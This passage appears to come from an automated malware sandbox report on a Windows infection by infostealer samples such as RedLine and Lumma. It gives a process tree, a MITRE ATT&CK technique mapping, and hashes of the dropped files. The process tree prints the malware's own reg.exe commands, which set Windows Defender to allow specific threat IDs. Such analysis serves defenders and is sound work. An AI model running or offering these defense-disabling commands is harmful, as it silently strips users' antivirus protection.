\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:5488
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:5988
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:396
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:2872
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5188
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5004
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5076
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:836
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4520
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1148
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1508
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5548
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5424
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5340
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5556
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:1956
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4232
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5248
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS6AF5.tmp\Install.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS6AF5.tmp\Install.exe it /LdldidCDnd 385118 /S
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2108

                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                    PowerShell

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1059.001

                                                                                                                                                                                                                                                    System Services

                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                    T1569

                                                                                                                                                                                                                                                    Service Execution

                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                    T1569.002

                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1547

                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1547.001

                                                                                                                                                                                                                                                    Pre-OS Boot

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1542

                                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1542.003

                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                    Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1548

                                                                                                                                                                                                                                                    Bypass User Account Control

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1548.002

                                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1547

                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1547.001

                                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                    Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1548

                                                                                                                                                                                                                                                    Bypass User Account Control

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1548.002

                                                                                                                                                                                                                                                    Impair Defenses

                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                    T1562

                                                                                                                                                                                                                                                    Disable or Modify Tools

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1562.001

                                                                                                                                                                                                                                                    Disable or Modify System Firewall

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1562.004

                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                    Pre-OS Boot

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1542

                                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1542.003

                                                                                                                                                                                                                                                    Subvert Trust Controls

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1553

                                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1553.004

                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                    Unsecured Credentials

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1552

                                                                                                                                                                                                                                                    Credentials In Files

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1552.001

                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                    Impact

                                                                                                                                                                                                                                                    Service Stop

                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                    T1489

                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameStabilityService\GameService.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      288KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameStabilityService\GameStabilityService.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c4f2b643c3ff9bb7ae4fd625c9d98154

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      bd7c7190e45cbda09be256bee7622bb74f75f00c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      76b585b4eac7b0584f28d66d6bf37ad29b1ab73354cbd3c5bb1c819787208f0b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      2efeaf9473ac1a8f42fd5870154faa37b06e4f331768cd7934fd4aa685eb6da4e28eaa7357807c4bf37dd79fc4a5eaf70ab4324ed0100dcdb4abaf4d9b0a7dcb

                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameStabilityService\installm.bat
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      247B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      192ae14b572f1bdd164ee67855d5a83a

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      9cf0757c807a8b834470d216ccd85be9a6b60aa0

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      2f6be6b40cf7c1802b6540dbf0b90eac67fd6a94067a06090e1f71bee164188d

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      18fc80eb3d450359863d61cf9123a08cdfe8c52d5f59e97f5b42816584d474d8a080bb75e7fe92480d2961481d59584a3987b2e7a15e611b58885b4441085e3c

                                                                                                                                                                                                                                                    • C:\ProgramData\mozglue.dll
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      593KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                    • C:\ProgramData\nss3.dll
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      a6ea7bfcd3aac150c0caef765cb52281

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      037dc22c46a0eb0b9ad4c74088129e387cffe96b

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      f019af2e5e74cdf13c963910500f9436c66b6f2901f5056d72f82310f20113b9

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      c8d2d373b48a26cf6eec1f5cfc05819011a3fc49d863820ad07b6442dd6d5f64e27022a9e4c381eb58bf7f6b19f8e77d508734ff803073ec2fb32da9081b6f23

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      21KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      39d6d341ae81aa58683facd8ad37a143

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      43ba4f828a4679615366ea2dac9895f6b6c88574

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      fd5c2815579e4f5c73ea67adf5b8e5743b87eb52689477cc96a067e19eff7ca1

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      416f69c1f0875a58e85366cebfd45e16fbb830f2b2acf33550d992778be88054564bfb7ab2a3464d222299c66325d0dfbf3ec5a3d6f3ca35a4deb61c74792b12

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      656B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      184a117024f3789681894c67b36ce990

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      830B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      e6edb41c03bce3f822020878bde4e246

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.7MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000004001\crypted333.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      474KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      e967f019b01357086d92181e6ee28e0b

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      7f26480ea5ca0ee9481dfc0bea12194bd6f10283

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      c69c17f4c6b2206437e7954c02424b80605d40e98c0adcad6839e170c94b1c82

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      dd2abe993397cf9f117753fd71ed9f98c4952616ee30f10479fbc3dad93a88dcfbfd6b80083541c7a796936dd37667a0f178156bdf5c35abf76dd8b23015d88a

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      9faf597de46ed64912a01491fe550d33

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      49203277926355afd49393782ae4e01802ad48af

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      1d814be25e80fa6739f6f1eec2018102

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      44353b52a72e3f5c46b3d6078aab1211ce33b4fd

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      01862602fb4853d90796a1a669b4ec4ab5e8cc6a774bf94e707171d5e16594fc

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      15732577c4fd4a0d2303df2f2d623e165c94f5b8dcd92724681d41ac35ecefbe8c04052329ec6938a594086bf8a19a54253be9f33cc8b3a298261467cddf5578

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      778KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      05b11e7b711b4aaa512029ffcb529b5a

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      a8074cf8a13f21617632951e008cdfdace73bb83

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      2aab2ca39749b21877d1c52526009f9f5d251d934205e9f671a9e84cecd55afa

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      dde7b561ffb3b9fe71827be9313cd3b83900c3ce76b053d028e84223fba1b06035437b3860a74de7dc2f5d40f0b90bd7d60139701d752c803eb08f362a5d57ff

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      56e7d98642cfc9ec438b59022c2d58d7

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      26526f702e584d8c8b629b2db5d282c2125665d7

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000013001\amers.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      1.8MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      347e422b2ae7c101b6482d718a442080

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5ca16069596e369f99c68f1758282404ac8a66c4

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      da15b0d8fccdfbaef9b53dbd6fabccc96ed8b4c48574248f47f69080f3980b34

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      05d1cf8f351088c7df5e364f11f8372881e10190147f029a9385c7952493dc8c57e3c57b9e95ebc65e371fb14f388b84f90fccf75552913f636824c5be76e428

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000014001\ac03d4ef2c.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      2.3MB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      fa61d83edc26a3c28129d92466702fc3

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      5ae3ca15def57b10c8d9dea5790ddd2dddd6a93f

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      830e8b5bec3654b32e004fb66fc4a71e2c465c9b7d1e62d781856db871526407

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      e16fd25e26d026541053d096138fa58207510daaa945a5d92fb2dfd72c93521a83b1694f37de35c0f87af2c9059e14166e7b79fdc8cd8e4249db795fd00fb873

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      418KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      379KB

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      009669d63111ff8efad651efac7333af

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      d0ebf3a228e2d44e094aa3b1b056176bc05c8f40

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      4736228698b5bb9b7dc86f4dbfe539e54fe5f5153be6c4aec7b8269e34c7a84b

                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                      dbf32ce7ba68fa88f508bced74b898baa73679216374d885e279eaf848c8f197294f66a0131491050f70f93413d973cc1fe7245e8128758a6103a453e7aed808

                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                      208B

                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                      2dbc71afdfa819995cded3cc0b9e2e2e

                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                      60e1703c3fd4fe0fba9f1e65e10a61e0e72d9faf

                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                      5a0070457636d37c11deb3148f6914583148fe45a66f44d7852f007ed5aad0ac

                                                                                                                                                                                                                                                      SHA512

